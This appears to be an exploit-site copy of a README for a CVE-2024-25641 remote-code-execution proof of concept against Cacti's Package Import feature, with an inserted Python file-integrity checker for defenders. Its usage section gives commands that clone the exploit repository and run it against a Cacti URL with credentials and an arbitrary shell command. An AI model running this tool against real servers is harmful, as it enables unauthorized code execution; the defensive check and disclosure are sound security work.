## https://sploitus.com/exploit?id=0527C9DD-2777-50CF-AF15-D46ECBBA0C8A
# CVE-2024-25641 - Cacti 1.2.26 - Arbitrary file write to RCE 🌵

- [x] `Authenticated RCE`
- [x] `Cacti version < v1.2.26`

## Summary
___

An arbitrary file write vulnerability, exploitable through the "Package Import" feature, allows authenticated users having the "Import Templates" permission to execute arbitrary PHP code on the web server (RCE).
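
To catch the outcome of this bug from the defender's side, here is an added example (not part of the PoC repository or of Cacti itself) that snapshots the PHP files under a Cacti webroot and reports anything new or modified after a package import. The directory layout it builds is a constructed stand-in; the real webroot path is an assumption you supply.

```python
import hashlib
import tempfile
from pathlib import Path

# Added example, not the PoC's code: baseline the .php files in a Cacti webroot,
# then diff a later snapshot to spot files that the Package Import feature
# (or anything else) wrote or altered. Paths below are constructed for the demo.


def snapshot_php(webroot):
    """Return {relative_posix_path: sha256_hex} for every .php file under webroot."""
    root = Path(webroot)
    digests = {}
    for path in root.rglob("*.php"):
        if path.is_file():
            rel = path.relative_to(root).as_posix()
            digests[rel] = hashlib.sha256(path.read_bytes()).hexdigest()
    return digests


def diff_snapshots(before, after):
    """Return (added, modified): PHP files absent from the baseline, and ones whose hash changed."""
    added = sorted(p for p in after if p not in before)
    modified = sorted(p for p in after if p in before and after[p] != before[p])
    return added, modified


def demo():
    """Build a throwaway fake Cacti tree (constructed, not a real install) and run the check."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "resource").mkdir()
        (root / "index.php").write_text("<?php // stock file\n")
        before = snapshot_php(root)  # baseline taken on a known-good install

        # Simulate the effect of the vulnerability: a PHP file appears in a
        # directory the import feature can write to, and a stock file changes.
        (root / "resource" / "unexpected.php").write_text("<?php // dropped file\n")
        (root / "index.php").write_text("<?php // stock file, altered\n")

        return diff_snapshots(before, snapshot_php(root))


if __name__ == "__main__":
    added, modified = demo()
    print("added:", added)        # ['resource/unexpected.php']
    print("modified:", modified)  # ['index.php']
```

In practice, take the baseline from a clean deployment (or from the release tarball) and run the diff after each package import or on a schedule; any new .php file outside the expected tree is worth an incident look.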


## Proof Of Concept
___

![CVE DEMO](https://github.com/user-attachments/assets/1ee4800b-4fc1-4bf4-8b7a-a4e5999143e9)

## Usage
___

```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

pip install -r requirements.txt

python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

### With poetry
```
git clone https://github.com/StopThatTalace/CVE-2024-25641-CACTI-RCE-1.2.26.git && cd CVE-2024-25641-CACTI-RCE-1.2.26

poetry install

poetry run python3 CVE-2024-25641.py http://localhost/path/to/cacti/ --user admin --pass admin123 -x 'whoami'
```

## DISCLAIMER
This tool is intended for educational and testing purposes only. The author of this tool is not responsible for any misuse or illegal activities performed with it. Use this tool only on systems you own or have explicit permission to test. Unauthorized access to computer systems is illegal and unethical.